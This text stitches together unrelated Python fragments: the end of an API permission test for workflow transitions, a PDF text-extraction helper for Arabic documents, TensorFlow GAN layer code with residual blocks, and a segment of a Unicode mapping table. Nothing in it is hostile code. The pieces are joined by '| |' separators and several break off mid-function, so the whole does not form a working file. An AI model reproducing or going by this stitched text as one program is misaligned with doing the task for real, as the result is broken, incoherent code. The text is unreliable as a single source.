(True, UserGroupAccessLevel.ACCESS_LEVEL_OBSERVER,
UserGroupAccessLevel.ACCESS_LEVEL_OBSERVER, SCOPE_TYPE_NONE,
SEND_ID_CORRECT,
200),
# Admin with API Key with support access succeeds
(True, UserGroupAccessLevel.ACCESS_LEVEL_ADMIN,
UserGroupAccessLevel.ACCESS_LEVEL_SUPPORT, SCOPE_TYPE_NONE,
SEND_ID_CORRECT,
200),
# Admin with JWT token succeeds
(True, UserGroupAccessLevel.ACCESS_LEVEL_ADMIN,
None, None,
SEND_ID_CORRECT,
200),
# Developer with JWT token succeeds
(True, UserGroupAccessLevel.ACCESS_LEVEL_DEVELOPER,
None, None,
SEND_ID_CORRECT,
200),
# Observer with JWT token succeeds
(True, UserGroupAccessLevel.ACCESS_LEVEL_OBSERVER,
None, None,
SEND_ID_CORRECT,
200),
# Developer with developer API key scoped to correct Run Environment,
# explicit group finds the desired one
(True, UserGroupAccessLevel.ACCESS_LEVEL_DEVELOPER,
UserGroupAccessLevel.ACCESS_LEVEL_DEVELOPER, SCOPE_TYPE_CORRECT,
SEND_ID_CORRECT,
200),
# Developer with developer API key scoped to different Run Environment gets 404
(True, UserGroupAccessLevel.ACCESS_LEVEL_DEVELOPER,
UserGroupAccessLevel.ACCESS_LEVEL_DEVELOPER, SCOPE_TYPE_OTHER,
SEND_ID_CORRECT,
404),
# Admin with API Key, wrong UUID gets 404
(True, UserGroupAccessLevel.ACCESS_LEVEL_ADMIN,
UserGroupAccessLevel.ACCESS_LEVEL_ADMIN, SCOPE_TYPE_NONE,
SEND_ID_NOT_FOUND,
404),
# Admin with API Key with wrong group gets 404
(True, UserGroupAccessLevel.ACCESS_LEVEL_ADMIN,
UserGroupAccessLevel.ACCESS_LEVEL_ADMIN, SCOPE_TYPE_NONE,
SEND_ID_IN_WRONG_GROUP,
404),
# No authentication yields 401
(False, UserGroupAccessLevel.ACCESS_LEVEL_ADMIN,
None, None,
SEND_ID_CORRECT,
401),
])
@mock_ecs
@mock_sts
@mock_events
def test_workflow_transition_fetch(
is_authenticated: bool, group_access_level: Optional[int],
api_key_access_level: Optional[int],
api_key_scope_type: str,
uuid_send_type: str,
status_code: int,
user_factory, group_factory, run_environment_factory, workflow_factory,
workflow_task_instance_factory, task_factory,
workflow_transition_factory, api_client) -> None:
user = user_factory()
workflow_transition, _workflow, api_key_run_environment, client, url = common_setup(
is_authenticated=is_authenticated,
group_access_level=group_access_level,
api_key_access_level=api_key_access_level,
api_key_scope_type=api_key_scope_type,
uuid_send_type=uuid_send_type,
existing_has_run_environment=True,
create_existing=True,
user=user,
group_factory=group_factory,
run_environment_factory=run_environment_factory,
workflow_factory=workflow_factory,
workflow_task_instance_factory=workflow_task_instance_factory,
task_factory=task_factory,
workflow_transition_factory=workflow_transition_factory,
api_client=api_client)
response = client.get(url)
assert response.status_code == status_code
if status_code == 200:
assert group_access_level is not None
ensure_serialized_workflow_transition_valid(response_workflow_transition=response.data,
workflow_transition=cast(WorkflowTransition, workflow_transition),
user=user,
group_access_level=group_access_level,
api_key_access_level=api_key_access_level,
| |
# -*- coding: utf-8 -*-
# Python imports
import io
import collections
import random
import os
import re
import sys
import time
from lxml import etree
# 3rd party imports
from pdfminer.pdfpage import PDFPage
from pdfminer.pdfinterp import PDFResourceManager
from pdfminer.pdfinterp import PDFPageInterpreter
from pdfminer.converter import XMLConverter
from pdfminer.layout import LAParams
# Project imports
# Importing pdf_canvas registers the fonts that the PDF will use.
import rollgen.pdf_canvas # noqa
from ..utils import is_iterable
# Our PDFs use only Amiri-Regular and Amiri-Bold
EXPECTED_FONTS = ('Amiri-Regular', 'Amiri-Bold',)
# Canonical vs. isolated presentation form of the Arabic letter alef.
ALEF_CANONICAL = '\u0627'
ALEF_ISOLATED = '\ufe8d'
# Non-breaking space.
NBSP = '\u00a0'
# Diacritics that need to be handled in swap_diacritics() (q.v.).
KASRA = '\u0650'
SHADDA = '\u0651'
FATHA = '\u064e'
DAMMA = '\u064f'
# Matches any character followed by one of the diacritics above. The string
# form is immediately replaced by its compiled version.
DIACRITIC_SWAP_REGEX = '(.[{}])'.format(''.join((KASRA, SHADDA, FATHA, DAMMA)))
DIACRITIC_SWAP_REGEX = re.compile(DIACRITIC_SWAP_REGEX, re.IGNORECASE)
# I use an explicit random seed so that if there's a bug in this run I can reproduce the
# bug by temporarily hardcoding the seed. I make the seed an int because floats are imperfectly
# represented by print, and I can't re-use the seed if I don't have an exact representation of it.
seed = int(time.time())
random.seed(seed)
# Writing to stderr ensures that if a test fails on Travis, the seed will be visible in Travis' log.
sys.stderr.write("seed is {}\n".format(seed))
def parse_bbox(bbox):
    """Convert a PDFMiner comma-delimited bbox string into a list of floats."""
    return [float(coordinate) for coordinate in bbox.split(',')]
def unwrap_lines(lines, index):
    """Merge the wrapped pair lines[index] / lines[index + 1] into one line.

    Long center and subcon names sometimes wrap onto a second line in the
    extracted PDF text (usually on cover pages); that's expected, but the
    expected-lines builder in the tests can't predict where the PDF layout
    engine wraps. It's easier to unwrap the actual lines than to wrap the
    expected ones, which is what this helper does. Note that the second
    (continuation) line is placed *before* the first in the joined result.
    """
    joined = lines[index + 1] + ' ' + lines[index]
    head = lines[:index]
    tail = lines[index + 2:]
    return head + [joined] + tail
def clean_font_name(font_name):
    """Strip the subset prefix (e.g. "AAAAAA+") from a PDFMiner font name.

    Font names in PDFMiner's XML often arrive as e.g. AAAAAA+Arial-BoldMT;
    only the part after the first '+' is kept. Names without a '+' are
    returned unchanged.
    """
    if '+' not in font_name:
        return font_name
    return font_name.split('+')[1]
def clean_textlines(textlines):
    """Flatten textlines (lists of single-character <text> elements, as from
    extract_textlines()) into plain strings, scrubbing round-trip artifacts
    via normalize_alef() and swap_diacritics().
    """
    cleaned = []
    for elements in textlines:
        raw = ''.join(element.text for element in elements)
        cleaned.append(swap_diacritics(normalize_alef(raw)))
    return cleaned
def extract_pdf_page(filename, page_number_or_numbers):
    """Extract the given page(s) of a PDF with PDFMiner and return XML bytes
    (utf-8).

    page_number_or_numbers may be a single page number or an iterable of
    page numbers.
    """
    # Adapted from pdf2txt.py (part of PDFMiner); the command-line
    # equivalent is: pdf2txt.py -p 1 -o expected.xml sample.pdf
    if is_iterable(page_number_or_numbers):
        page_numbers = page_number_or_numbers
    else:
        page_numbers = [page_number_or_numbers]
    output_buffer = io.BytesIO()
    resource_manager = PDFResourceManager()
    converter = XMLConverter(resource_manager, output_buffer, codec='utf-8',
                             laparams=LAParams())
    with open(filename, 'rb') as pdf_file:
        interpreter = PDFPageInterpreter(resource_manager, converter)
        for page in PDFPage.get_pages(pdf_file, page_numbers):
            interpreter.process_page(page)
    converter.close()
    xml = output_buffer.getvalue()
    output_buffer.close()
    return xml
def extract_textlines(xml):
    """Given XML (bytes) from PDFMiner, return a list of lines, where each
    line is a list of PDFMiner <text> elements (one character each).

    Elements within a line are ordered left-to-right as on the page; lines
    are ordered top-to-bottom.

    Why we rebuild lines ourselves: PDFMiner groups <text> elements into
    <textline> elements, and within a textline the element order does match
    the visible left-to-right order. However, the <textline> elements
    themselves are not emitted in any obvious top-to-bottom order, and text
    elements with identical y-extents are sometimes split across several
    textlines. Our PDFs also contain genuinely overlapping glyphs (some
    Arabic letters are stored in decomposed form, diacritic + letter), so
    "line" is ambiguous for PDFMiner anyway.

    Bbox reminder (from the PDFMiner docs/mailing list): bbox is
    (x0, y0, x1, y1) with the origin at the *bottom left* of the page, so
    (0, 0) is bottom-left and e.g. (612, 792) is top-right for A4.

    Algorithm:
      - ignore <textline> wrappers; collect all <text> elements
      - group them by bbox.y1
      - within each group sort by (bbox.x0, bbox.x1) -- x0 alone is not
        sufficient when dealing with diacritics
      - emit groups in descending y1 (top of page first)
    """
    root = etree.fromstring(xml)
    # Group (coords, element) pairs by the top edge (y1) of their bbox.
    elements_by_y1 = collections.defaultdict(list)
    for text_element in root.xpath('.//text'):
        bbox = text_element.get('bbox')
        if not bbox:
            # Some text elements (e.g. newlines) carry no bbox; discard them.
            continue
        x0, y0, x1, y1 = parse_bbox(bbox)
        elements_by_y1[y1].append(((x0, x1), text_element))
    lines = []
    # Descending y1 == top of page first.
    for y1 in sorted(elements_by_y1.keys(), reverse=True):
        # Left-to-right within the line.
        ordered = sorted(elements_by_y1[y1], key=lambda entry: entry[0])
        lines.append([element for _, element in ordered])
    return lines
def extract_line_lengths(xml):
    """Given Unicode XML from PDFMiner, return a list of line lengths.

    Lengths appear in the same order as the lines in the PDF (first page to
    last, top to bottom of each page). The unit is Reportlab's default; all
    values share it, so they are mutually comparable.
    """
    lengths = []
    for line in extract_textlines(xml):
        # Each line is a list of single-character <text> elements; only the
        # bbox of the first and last characters matters:
        # length = (x1 of the last character) - (x0 of the first).
        first_x0 = parse_bbox(line[0].get('bbox'))[0]
        last_x1 = parse_bbox(line[-1].get('bbox'))[2]
        lengths.append(last_x1 - first_x0)
    return lengths
def _get_random_words(filename, n_words):
"""Given a # | |
import tensorflow as tf
##################################################################################
# Initialization
##################################################################################
# Xavier : tf_contrib.layers.xavier_initializer()
# He : tf_contrib.layers.variance_scaling_initializer()
# Normal : tf.random_normal_initializer(mean=0.0, stddev=0.02)
# Truncated_normal : tf.truncated_normal_initializer(mean=0.0, stddev=0.02)
# Orthogonal : tf.orthogonal_initializer(1.0) / relu = sqrt(2), the others = 1.0
# TF1-style truncated-normal initializer shared by the layer helpers below.
weight_init = tf.truncated_normal_initializer(mean=0.0, stddev=0.02)
# Default dtype for GAN tensors.
gan_dtype = tf.float32
from utils import round_up  # project helper (mid-module import kept as-is)
##################################################################################
# Layer
##################################################################################
def subpixel_conv(x, channels, opt, kernel=3, scale=2, use_bias=True, scope='subpixel_conv_0'):
    """Upscale `x` by `scale` using sub-pixel convolution: a stride-1 conv that
    emits scale^2 times the target channels, then a depth-to-space shuffle."""
    expanded = conv(x, channels * (scale * scale), opt=opt, kernel=kernel, stride=1,
                    use_bias=use_bias, pad=(kernel - 1) / 2.0, scope=scope)
    return tf.nn.depth_to_space(expanded, block_size=scale)
def decode_kernel_sizes(str):  # parameter name kept for backward compatibility; it shadows the builtin
    """Parse a kernel-size spec such as "64x3,32x5" into its slices.

    Each comma-separated "SIZExKERNEL" part becomes {"size": SIZE, "kernel": KERNEL}.

    Returns:
        dict with "slices" (list of the parsed parts, in order) and
        "total_channels" (sum of all SIZE values).

    Fix: the original body also shadowed the builtin `sum` with a local.
    """
    spec = str
    slices = []
    total_channels = 0
    for part in spec.split(','):
        size, kernel_size = part.split('x')
        slices.append({"size": int(size), "kernel": int(kernel_size)})
        total_channels += int(size)
    return {"slices": slices, "total_channels": total_channels}
def encode_kernel_sizes(slices, ch_mul=1.0):
    """Inverse of decode_kernel_sizes: render slice dicts as "SIZExKERNEL,...",
    scaling each size by `ch_mul` (a tiny epsilon keeps exact float multiples
    from being truncated down by int())."""
    parts = []
    for entry in slices:
        scaled_size = int(float(entry["size"]) * ch_mul + 0.00000001)
        parts.append(str(scaled_size) + "x" + str(entry["kernel"]))
    return ",".join(parts)
def conv(x, channels, opt, kernel=4, stride=2, pad=0, dilation=1, use_bias=True, scope='conv_0'):
    """2-D convolution with optional spectral normalization, mixed kernel sizes
    and reflect/zero padding.

    `kernel` may be an int, or a spec string such as "64x3,32x5" (see
    decode_kernel_sizes): each slice is convolved with its own kernel size and
    the results are concatenated along the channel axis.
    Kernel regularization is applied only when the variable scope lies inside
    a 'generator' scope.
    """
    with tf.variable_scope(scope) as full_scope:
        if isinstance(kernel, str):
            # Mixed-kernel mode: one sub-conv per slice, concatenated channel-wise.
            slices = decode_kernel_sizes(kernel)["slices"]
            slice_convs = []
            for slice in slices:
                slice_conv = conv(x, slice["size"], opt, kernel=slice["kernel"], stride=stride, pad=(slice["kernel"]-1)//2, dilation=dilation, use_bias=use_bias, scope='conv'+str(slice["kernel"])+"_slice")
                slice_convs += [slice_conv]
            return tf.concat(slice_convs, axis=-1)
        tf_pad_type = 'VALID'
        if pad > 0:
            pad_type = opt.get("conv", {}).get("padding_type", 'reflect')
            h = x.get_shape().as_list()[1]
            # When the spatial size is not divisible by the stride, pad just
            # enough for the strided window to cover the input (SAME-style).
            if h % stride == 0:
                pad = pad * 2
            else:
                pad = max(kernel - (h % stride), 0)
            pad_top = int(pad//2)
            pad_bottom = int(pad - pad_top)
            pad_left = int(pad//2)
            pad_right = int(pad - pad_left)
            if pad_type == 'zero':
                tf_pad_type = 'SAME'
            elif pad_type == 'reflect':
                x = tf.pad(x, [[0, 0], [pad_top, pad_bottom], [pad_left, pad_right], [0, 0]], mode='REFLECT')
            else:
                raise ValueError("Unsupported padding type: "+str(pad_type))
        if opt.get("conv", {}).get("sn", True):
            # Spectral-norm path: build the kernel by hand so the weight can be
            # wrapped with spectral_norm() before the conv op.
            if 'generator' in full_scope.name:
                w = tf.get_variable("kernel", shape=[kernel, kernel, x.get_shape()[-1], channels], initializer=weight_init,
                                    regularizer=opt.get("conv", {}).get("regularizer", None), dtype=gan_dtype)
            else :
                w = tf.get_variable("kernel", shape=[kernel, kernel, x.get_shape()[-1], channels], initializer=weight_init,
                                    regularizer=None, dtype=gan_dtype)
            x = tf.nn.conv2d(input=x, filter=spectral_norm(w),
                             strides=[1, stride, stride, 1], padding=tf_pad_type, dilations=dilation)
            if use_bias :
                bias = tf.get_variable("bias", [channels], initializer=tf.constant_initializer(0.0), dtype=gan_dtype)
                x = tf.nn.bias_add(x, bias)
        else :
            # NOTE(review): tf.layers.conv2d takes `dilation_rate`, not
            # `dilations` -- confirm this keyword works on the TF version in use.
            if 'generator' in full_scope.name:
                x = tf.layers.conv2d(inputs=x, filters=channels,
                                     kernel_size=kernel, kernel_initializer=weight_init,
                                     kernel_regularizer=opt.get("conv", {}).get("regularizer", None),
                                     strides=stride, use_bias=use_bias, dilations=dilation)
            else :
                x = tf.layers.conv2d(inputs=x, filters=channels,
                                     kernel_size=kernel, kernel_initializer=weight_init,
                                     kernel_regularizer=None,
                                     strides=stride, use_bias=use_bias, dilations=dilation)
        return x
def deconv(x, channels, opt, kernel=4, stride=2, padding='SAME', use_bias=True, scope='deconv_0'):
    """Transposed 2-D convolution (upsampling) with optional spectral norm.

    The output shape is derived from the static input shape, so the batch
    dimension must be statically known on the spectral-norm path.
    """
    with tf.variable_scope(scope):
        x_shape = x.get_shape().as_list()
        if padding == 'SAME':
            output_shape = [x_shape[0], x_shape[1] * stride, x_shape[2] * stride, channels]
        else:
            # VALID: the kernel overhang enlarges the output beyond stride * size.
            output_shape = [x_shape[0], x_shape[1] * stride + max(kernel - stride, 0), x_shape[2] * stride + max(kernel - stride, 0), channels]
        if opt.get("conv", {}).get("sn", True):
            # conv2d_transpose kernels are laid out [k, k, out_ch, in_ch].
            # NOTE(review): unlike conv(), the regularizer is applied regardless
            # of whether we are inside a 'generator' scope -- confirm intended.
            w = tf.get_variable("kernel", shape=[kernel, kernel, channels, x.get_shape()[-1]], initializer=weight_init, regularizer=opt.get("conv", {}).get("regularizer", None), dtype=gan_dtype)
            x = tf.nn.conv2d_transpose(x, filter=spectral_norm(w), output_shape=output_shape, strides=[1, stride, stride, 1], padding=padding)
            if use_bias :
                bias = tf.get_variable("bias", [channels], initializer=tf.constant_initializer(0.0), dtype=gan_dtype)
                x = tf.nn.bias_add(x, bias)
        else :
            x = tf.layers.conv2d_transpose(inputs=x, filters=channels,
                                           kernel_size=kernel, kernel_initializer=weight_init, kernel_regularizer=opt.get("conv", {}).get("regularizer", None),
                                           strides=stride, padding=padding, use_bias=use_bias)
        return x
def get_variable_with_custom_lr(name, shape, regularizer, lrmul):
    """Create a variable with a scaled effective learning rate (StyleGAN-style):
    the init std-dev shrinks by `lrmul` while the runtime value grows by it."""
    var = tf.get_variable(name, shape, gan_dtype,
                          initializer=tf.truncated_normal_initializer(mean=0.0, stddev=0.02/lrmul),
                          regularizer=regularizer)
    return var if lrmul == 1.0 else var * lrmul
def fully_connected(x, units, opt, use_bias=True, lrmul=1.0, scope='fully_0'):
    """Dense layer with optional spectral normalization and per-layer lr scaling.

    The input is flattened first.  opt["fc_regularizer"] is applied only inside
    a 'generator' scope; `lrmul` only takes effect on the spectral-norm path.
    """
    with tf.variable_scope(scope) as full_scope:
        x = flatten(x)
        shape = x.get_shape().as_list()
        channels = shape[-1]
        if opt.get("conv", {}).get("sn", True):
            if 'generator' in full_scope.name:
                w = get_variable_with_custom_lr("kernel", shape=[channels, units], regularizer=opt["fc_regularizer"], lrmul=lrmul)
            else :
                w = get_variable_with_custom_lr("kernel", shape=[channels, units], regularizer=None, lrmul=lrmul)
            if use_bias :
                bias = tf.get_variable("bias", [units], initializer=tf.constant_initializer(0.0), dtype=gan_dtype)
                x = tf.matmul(x, spectral_norm(w)) + bias
            else :
                x = tf.matmul(x, spectral_norm(w))
        else :
            if 'generator' in full_scope.name:
                x = tf.layers.dense(x, units=units, kernel_initializer=weight_init,
                                    kernel_regularizer=opt["fc_regularizer"], use_bias=use_bias)
            else :
                x = tf.layers.dense(x, units=units, kernel_initializer=weight_init,
                                    kernel_regularizer=None, use_bias=use_bias)
        return x
def flatten(x) :
    """Collapse all non-batch dimensions into one: (B, ...) -> (B, prod(...))."""
    return tf.layers.flatten(x)
def hw_flatten(x) :
    """Merge spatial axes: (B, H, W, C) -> (B, H*W, C).
    Uses the static x.shape[0], so the batch size must be known."""
    return tf.reshape(x, shape=[x.shape[0], -1, x.shape[-1]])
##################################################################################
# Residual-block, Self-Attention-block
##################################################################################
def resblock(x_init, channels, opt, use_bias=True, scope='resblock'):
    """Plain residual block: two 3x3 convs (optionally batch-normed) plus a
    skip connection.  `channels` must equal x_init's channel count for the
    final addition to be shape-valid."""
    with tf.variable_scope(scope):
        with tf.variable_scope('res1'):
            x = conv(x_init, channels, kernel=3, stride=1, pad=1, use_bias=use_bias, opt=opt)
            if (opt["bn_in_d"]): x = bn(x, opt=opt)
            x = opt["act"](x)
        with tf.variable_scope('res2'):
            x = conv(x, channels, kernel=3, stride=1, pad=1, use_bias=use_bias, opt=opt)
            if (opt["bn_in_d"]): x = bn(x, opt=opt)
        return x + x_init
def upconv(x, channels, opt, use_bias=True):
    """2x spatial upsampling, dispatched on opt["upsampling_method"].
    Note: 'nn' ignores `channels` (plain nearest-neighbour resize, no conv)."""
    if opt["upsampling_method"] == 'deconv3':
        return deconv(x, channels, kernel=3, stride=2, use_bias=use_bias, opt=opt)
    elif opt["upsampling_method"] == 'deconv4':
        return deconv(x, channels, kernel=4, stride=2, use_bias=use_bias, opt=opt)
    elif opt["upsampling_method"] == 'deconv6':
        return deconv(x, channels, kernel=6, stride=2, use_bias=use_bias, opt=opt)
    elif opt["upsampling_method"] == 'subpixel2':
        return subpixel_conv(x, channels, kernel=2, scale=2, use_bias=use_bias, opt=opt)
    elif opt["upsampling_method"] == 'subpixel3':
        return subpixel_conv(x, channels, kernel=3, scale=2, use_bias=use_bias, opt=opt)
    elif opt["upsampling_method"] == 'resize_conv':
        # Resize followed by 3x3 conv (a common checkerboard-artifact avoidance).
        x = up_sample(x, 2)
        x = conv(x, channels, kernel=3, stride=1, pad=1, use_bias=use_bias, opt=opt)
        return x
    elif opt["upsampling_method"]=='nn':
        return up_sample(x, 2)
    else: raise ValueError("Invalid upsampling method specified: "+str(opt["upsampling_method"]))
def g_conv(x, channels, opt, use_bias=True):
    """Stride-1 generator convolution; the flavour is chosen by opt["g_conv"]."""
    mode = opt["g_conv"]
    dispatch = {
        'deconv3': lambda: deconv(x, channels, kernel=3, stride=1, use_bias=use_bias, opt=opt),
        'deconv4': lambda: deconv(x, channels, kernel=4, stride=1, use_bias=use_bias, opt=opt),
        'conv3':   lambda: conv(x, channels, kernel=3, stride=1, pad=1, use_bias=use_bias, opt=opt),
        'conv5':   lambda: conv(x, channels, kernel=5, stride=1, pad=2, use_bias=use_bias, opt=opt),
    }
    if mode not in dispatch:
        raise ValueError("Invalid generator convolution type specified: "+str(mode))
    return dispatch[mode]()
def resblock_up(x_init, channels, opt, use_bias=True, scope='resblock_up'):
    """Pre-activation residual block that also upsamples 2x (BN -> act -> upconv)."""
    with tf.variable_scope(scope):
        with tf.variable_scope('res1'):
            x = bn(x_init, opt=opt)
            x = opt["act"](x)
            x = upconv(x, channels, use_bias=use_bias, opt=opt)
        with tf.variable_scope('res2') :
            x = bn(x, opt=opt)
            x = opt["act"](x)
            x = g_conv(x, channels, use_bias=use_bias, opt=opt)
        with tf.variable_scope('skip') :
            # The skip path upsamples too so both addends have matching shapes.
            x_init = upconv(x_init, channels, use_bias=use_bias, opt=opt)
        return x + x_init
def resblock_up_condition(x_init, z, channels, opt, use_bias=True, scope='resblock_up'):
    """Like resblock_up, but uses conditional batch norm driven by `z`."""
    with tf.variable_scope(scope):
        with tf.variable_scope('res1'):
            x = cond_bn(x_init, z, opt=opt)
            x = opt["act"](x)
            x = upconv(x, channels, use_bias=use_bias, opt=opt)
        with tf.variable_scope('res2') :
            x = cond_bn(x, z, opt=opt)
            x = opt["act"](x)
            x = g_conv(x, channels, use_bias=use_bias, opt=opt)
        with tf.variable_scope('skip') :
            # The skip path upsamples too so both addends have matching shapes.
            x_init = upconv(x_init, channels, use_bias=use_bias, opt=opt)
        return x + x_init
def downconv(x, channels, opt, use_bias=True, method=None):
    """2x spatial downsampling, dispatched on `method` (defaults to
    opt["downsampling_method"]).

    Fix: the default test used `method == None`; the identity comparison
    `is None` is the correct idiom and avoids any custom __eq__.
    """
    if method is None:
        method = opt["downsampling_method"]
    if method == 'strided_conv3':
        return conv(x, channels, kernel=3, stride=2, pad=1, use_bias=use_bias, opt=opt)
    elif method == 'resize_conv1':
        x = conv(x, channels, kernel=1, stride=1, pad=0, use_bias=use_bias, opt=opt)
        return avg_pooling(x)
    elif method == 'resize_conv3':
        x = conv(x, channels, kernel=3, stride=1, pad=1, use_bias=use_bias, opt=opt)
        return avg_pooling(x)
    elif method == 'resize_conv35':
        # Split channels ~2:1 between a 3x3 and a 5x5 kernel (mixed-kernel conv).
        channels5 = int(channels*0.333333333334)
        channels3 = channels - channels5
        x = conv(x, channels, kernel=str(channels3)+"x3,"+str(channels5)+"x5", stride=1, pad=1, use_bias=use_bias, opt=opt)
        return avg_pooling(x)
    elif method == 'pool_only':
        return avg_pooling(x)
    elif method == 'max_pool_only':
        return max_pooling(x)
    else: raise ValueError("Invalid downsampling method specified: "+str(method))
def resblock_down(x_init, channels, opt, use_bias=True, scope='resblock_down'):
    """Residual block that downsamples 2x on both the main and skip paths."""
    with tf.variable_scope(scope):
        with tf.variable_scope('res1'):
            if (opt["bn_in_d"]): x = bn(x_init, opt=opt)
            else: x = x_init
            x = opt["act"](x)
            # The residual branch keeps strided_conv3 as-is; any other
            # configured method is mapped to resize_conv3 here.
            res_method = opt["downsampling_method"]
            if res_method!='strided_conv3':
                res_method = 'resize_conv3'
            x = downconv(x, channels, use_bias=use_bias, opt=opt, method=res_method)
        with tf.variable_scope('res2') :
            if (opt["bn_in_d"]): x = bn(x, opt=opt)
            x = opt["act"](x)
            x = conv(x, channels, kernel=3, stride=1, pad=1, use_bias=use_bias, opt=opt)
        with tf.variable_scope('skip') :
            x_init = downconv(x_init, channels, use_bias=use_bias, opt=opt, method=opt["downsampling_method"])
        return x + x_init
def resblock_up_cond_deep(x_init, z, channels_out, opt, upscale=True, use_bias=True, scope='deep_resblock'):
    """Deep (bottlenecked) conditional residual up-block (BigGAN-deep style).

    The skip path keeps the first `channels_out` input channels and drops the
    rest when the channel count changes.

    Fix: removed a leftover debug print() in the skip branch.
    """
    channels_in = int(x_init.get_shape()[-1])
    # Bottleneck width, rounded up to a multiple of 8.
    inner_channels = round_up((channels_in + channels_out)//6, 8)
    with tf.variable_scope(scope):
        with tf.variable_scope('bottleneck'):
            x = cond_bn(x_init, z, opt=opt)
            x = opt["act"](x)
            x = conv(x, inner_channels, kernel=1, stride=1, use_bias=False, opt=opt)
        with tf.variable_scope('upscale'):
            x = cond_bn(x, z, opt=opt)
            x = opt["act"](x)
            if upscale:
                x = upconv(x, inner_channels, use_bias=False, opt=opt)
        with tf.variable_scope('inner1'):
            x = g_conv(x, inner_channels, use_bias=False, opt=opt)
            x = cond_bn(x, z, opt=opt)
            x = opt["act"](x)
        with tf.variable_scope('inner2'):
            x = g_conv(x, inner_channels, use_bias=False, opt=opt)
            x = bn(x, opt=opt)
            x = opt["act"](x)
        with tf.variable_scope('proj'):
            x = conv(x, channels_out, kernel=1, stride=1, use_bias=use_bias, opt=opt)
        with tf.variable_scope('skip'):
            if channels_in != channels_out:
                # NOTE(review): tf.split fails if channels_out > channels_in
                # (negative split size) -- confirm callers only shrink channels.
                kept, dropped = tf.split(x_init, num_or_size_splits=[channels_out, channels_in - channels_out], axis=-1)
            else:
                kept = x_init
            # NOTE(review): when upscale is False, `kept` is never used and the
            # original x_init (possibly mismatched channels) flows into the add
            # -- confirm this path is unreachable or intended.
            if upscale:
                x_init = upconv(kept, channels_out, use_bias=use_bias, opt=opt)
        return x + x_init
def resblock_down_deep(x_init, channels_out, opt, downscale=True, use_bias=True, scope='deep_resblock'):
channels_in = x_init.get_shape()[-1]
inner_channels = round_up((channels_in + channels_out)//6, 8)
with tf.variable_scope(scope):
with tf.variable_scope('bottleneck'):
x = x_init
if (opt["bn_in_d"]): x = bn(x, opt=opt)
x = opt["act"](x)
x = conv(x, inner_channels, kernel=1, stride=1, pad=0, use_bias=use_bias, opt=opt)
with tf.variable_scope('inner1'):
if (opt["bn_in_d"]): x = bn(x, opt=opt)
x = opt["act"](x)
x = conv(x, inner_channels, kernel=3, stride=1, pad=1, use_bias=use_bias, opt=opt)
with tf.variable_scope('inner2'):
if (opt["bn_in_d"]): x = bn(x, opt=opt)
x = opt["act"](x)
x = conv(x, inner_channels, kernel=3, stride=1, pad=1, use_bias=use_bias, opt=opt)
with tf.variable_scope('downscale'):
x = opt["act"](x)
if downscale:
x = downconv(x, inner_channels, use_bias=use_bias, opt=opt, method='pool_only')
with tf.variable_scope('proj'):
x = conv(x, channels_out, kernel=1, stride=1, pad=0, use_bias=use_bias, opt=opt)
with tf.variable_scope('skip'):
if downscale:
x_init = downconv(x_init, channels_in, use_bias=use_bias, opt=opt, method='pool_only')
if channels_in != channels_out:
conv_ch = channels_out - channels_in
dense = conv(x_init, conv_ch, kernel=1, stride=1, pad=0, use_bias=use_bias, opt=opt)
x_init = tf.concat([x_init, | |
(0x1FC7, 'M', u'ῆι'),
(0x1FC8, 'M', u'ὲ'),
(0x1FC9, 'M', u'έ'),
(0x1FCA, 'M', u'ὴ'),
(0x1FCB, 'M', u'ή'),
(0x1FCC, 'M', u'ηι'),
(0x1FCD, '3', u' ̓̀'),
(0x1FCE, '3', u' ̓́'),
(0x1FCF, '3', u' ̓͂'),
(0x1FD0, 'V'),
(0x1FD3, 'M', u'ΐ'),
(0x1FD4, 'X'),
(0x1FD6, 'V'),
(0x1FD8, 'M', u'ῐ'),
(0x1FD9, 'M', u'ῑ'),
(0x1FDA, 'M', u'ὶ'),
(0x1FDB, 'M', u'ί'),
(0x1FDC, 'X'),
(0x1FDD, '3', u' ̔̀'),
(0x1FDE, '3', u' ̔́'),
(0x1FDF, '3', u' ̔͂'),
(0x1FE0, 'V'),
(0x1FE3, 'M', u'ΰ'),
(0x1FE4, 'V'),
(0x1FE8, 'M', u'ῠ'),
(0x1FE9, 'M', u'ῡ'),
(0x1FEA, 'M', u'ὺ'),
(0x1FEB, 'M', u'ύ'),
(0x1FEC, 'M', u'ῥ'),
(0x1FED, '3', u' ̈̀'),
(0x1FEE, '3', u' ̈́'),
(0x1FEF, '3', u'`'),
(0x1FF0, 'X'),
(0x1FF2, 'M', u'ὼι'),
(0x1FF3, 'M', u'ωι'),
(0x1FF4, 'M', u'ώι'),
(0x1FF5, 'X'),
(0x1FF6, 'V'),
(0x1FF7, 'M', u'ῶι'),
(0x1FF8, 'M', u'ὸ'),
(0x1FF9, 'M', u'ό'),
(0x1FFA, 'M', u'ὼ'),
(0x1FFB, 'M', u'ώ'),
(0x1FFC, 'M', u'ωι'),
(0x1FFD, '3', u' ́'),
(0x1FFE, '3', u' ̔'),
(0x1FFF, 'X'),
(0x2000, '3', u' '),
(0x200B, 'I'),
(0x200C, 'D', u''),
(0x200E, 'X'),
(0x2010, 'V'),
(0x2011, 'M', u'‐'),
(0x2012, 'V'),
(0x2017, '3', u' ̳'),
(0x2018, 'V'),
(0x2024, 'X'),
(0x2027, 'V'),
(0x2028, 'X'),
(0x202F, '3', u' '),
(0x2030, 'V'),
(0x2033, 'M', u'′′'),
(0x2034, 'M', u'′′′'),
(0x2035, 'V'),
(0x2036, 'M', u'‵‵'),
(0x2037, 'M', u'‵‵‵'),
]
def _seg_21():
    """Return one segment of the Unicode mapping table: (codepoint, status[, mapping]) tuples.
    Presumably these follow UTS #46 conventions ('V' valid, 'M' mapped, 'X' disallowed,
    '3' STD3-relevant, 'I' ignored) as in idna's uts46data -- confirm against the generator."""
    return [
    (0x2038, 'V'),
    (0x203C, '3', u'!!'),
    (0x203D, 'V'),
    (0x203E, '3', u' ̅'),
    (0x203F, 'V'),
    (0x2047, '3', u'??'),
    (0x2048, '3', u'?!'),
    (0x2049, '3', u'!?'),
    (0x204A, 'V'),
    (0x2057, 'M', u'′′′′'),
    (0x2058, 'V'),
    (0x205F, '3', u' '),
    (0x2060, 'I'),
    (0x2061, 'X'),
    (0x2064, 'I'),
    (0x2065, 'X'),
    (0x2070, 'M', u'0'),
    (0x2071, 'M', u'i'),
    (0x2072, 'X'),
    (0x2074, 'M', u'4'),
    (0x2075, 'M', u'5'),
    (0x2076, 'M', u'6'),
    (0x2077, 'M', u'7'),
    (0x2078, 'M', u'8'),
    (0x2079, 'M', u'9'),
    (0x207A, '3', u'+'),
